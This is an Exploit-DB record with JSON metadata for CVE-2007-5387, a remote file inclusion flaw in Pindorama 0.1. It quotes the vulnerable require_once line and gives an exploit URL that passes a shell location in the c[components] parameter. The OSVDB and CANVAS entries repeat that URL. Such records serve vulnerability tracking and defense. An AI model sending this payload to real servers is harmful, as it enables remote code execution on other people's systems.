ID EDB-ID:4519
Type exploitdb
Reporter S.W.A.T.
Modified 2007-10-11T00:00:00
Description
Pindorama 0.1 client.php Remote File Inclusion Vulnerability. CVE-2007-5387. Webapps exploit for php platform
\\\|///
\\ - - // Xmors Underground Group
( @ @ )
----oOOo--(_)-oOOo--------------------------------------------------
Portal : Pindorama 0.1
Download : http://downloads.sourceforge.net/pindorama/pindorama-0.1.zip
Author : S.W.A.T.
HomePage : wWw.XmorS.CoM
Type : Remote File Inclusion
Y! ID : Svvateam
E-Mail : Svvateam@yahoo.com / S.W.4.T@hackermail.com
Dork : :(
----ooooO-----Ooooo--------------------------------------------------
( ) ( )
\ ( ) /
\_) (_/
+---------------------------------------------------------------------------------------------+
Vuln Code :
require_once($c["components"]."xmlrpc/common.php");
+---------------------------------------------------------------------------------------------+
+---------------------------------------------------------------------------------------------+
Exploit :
http://[TARGET]/[PATH]/active/components/xmlrpc/client.php?c[components]=[-Sh3ll-]
+---------------------------------------------------------------------------------------------+
# milw0rm.com [2007-10-11]
{"bulletinFamily": "exploit", "id": "EDB-ID:4519", "cvelist": ["CVE-2007-5387"], "modified": "2007-10-11T00:00:00", "lastseen": "2016-01-31T21:07:17", "edition": 1, "sourceData": " \\\\\\|///\n \\\\ - - // Xmors Underground Group\n ( @ @ )\n \n ----oOOo--(_)-oOOo--------------------------------------------------\n Portal : Pindorama 0.1\n Download : http://downloads.sourceforge.net/pindorama/pindorama-0.1.zip\n\t Author : S.W.A.T.\n\t HomePage : wWw.XmorS.CoM\n\t Type : Remote File Inclusion\n Y! ID : Svvateam\n E-Mail : Svvateam@yahoo.com / S.W.4.T@hackermail.com\n Dork : :( \n \n ----ooooO-----Ooooo--------------------------------------------------\n ( ) ( )\n \\ ( ) /\n \\_) (_/\n\n\n\n+---------------------------------------------------------------------------------------------+\n\nVuln Code :\n\nrequire_once($c[\"components\"].\"xmlrpc/common.php\");\n\n+---------------------------------------------------------------------------------------------+\n+---------------------------------------------------------------------------------------------+\n\nExploit :\n\nhttp://[TARGET]/[PATH]/active/components/xmlrpc/client.php?c[components]=[-Sh3ll-]\n\n\n+---------------------------------------------------------------------------------------------+\n\n# milw0rm.com [2007-10-11]\n", "published": "2007-10-11T00:00:00", "href": "https://www.exploit-db.com/exploits/4519/", "osvdbidlist": ["37879"], "reporter": "S.W.A.T.", "hash": "76390cc018806bab2a0d3562be12d70d33c937651f9aad3096c07c0ba149fbb3", "title": "Pindorama 0.1 client.php Remote File Inclusion Vulnerability", "history": [], "type": "exploitdb", "objectVersion": "1.0", "description": "Pindorama 0.1 client.php Remote File Inclusion Vulnerability. CVE-2007-5387. Webapps exploit for php platform", "references": [], "cvss": {"score": 6.8, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "sourceHref": "https://www.exploit-db.com/download/4519/", "viewCount": 1, "enchantments": {"vulnersScore": 5.0}}
{"result": {"cve": [{"id": "CVE-2007-5387", "type": "cve", "title": "CVE-2007-5387", "description": "PHP remote file inclusion vulnerability in active/components/xmlrpc/client.php in Pindorama 0.1 allows remote attackers to execute arbitrary PHP code via a URL in the c[components] parameter.", "published": "2007-10-12T06:17:00", "cvss": {"score": 6.8, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2007-5387", "cvelist": ["CVE-2007-5387"], "lastseen": "2017-09-29T14:25:33"}], "canvas": [{"id": "PINDORAMA_INCLUDE", "type": "canvas", "title": "Immunity Canvas: PINDORAMA_INCLUDE", "description": "**Name**| pindorama_include \n---|--- \n**CVE**| CVE-2007-5387 \n**Exploit Pack**| [CANVAS](<http://http://www.immunityinc.com/products-canvas.shtml>) \n**Description**| pindorama remote file include \n**Notes**| CVSS: 6.8 \nRepeatability: Infinite \nVENDOR: pindorama \nCVE Url: http://www.cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-5387 \nCVE Name: CVE-2007-5387 \n\n", "published": "2007-10-12T06:17:00", "cvss": {"score": 6.8, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "href": "http://exploitlist.immunityinc.com/home/exploitpack/CANVAS/pindorama_include", "cvelist": ["CVE-2007-5387"], "lastseen": "2016-09-25T14:13:09"}], "osvdb": [{"id": "OSVDB:37879", "type": "osvdb", "title": "Pindorama client.php c[components] Variable Remote File Inclusion", "description": "## Manual Testing Notes\nhttp://[TARGET]/[PATH]/active/components/xmlrpc/client.php?c[components]=[-Sh3ll-]\n## References:\nISS X-Force ID: 37179\nGeneric Exploit URL: http://www.milw0rm.com/exploits/4519\n[CVE-2007-5387](https://vulners.com/cve/CVE-2007-5387)\nBugtraq ID: 26026\n", "published": "2007-10-11T00:00:00", "cvss": {"score": 6.8, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "href": "https://vulners.com/osvdb/OSVDB:37879", "cvelist": ["CVE-2007-5387"], "lastseen": "2017-04-28T13:20:33"}]}}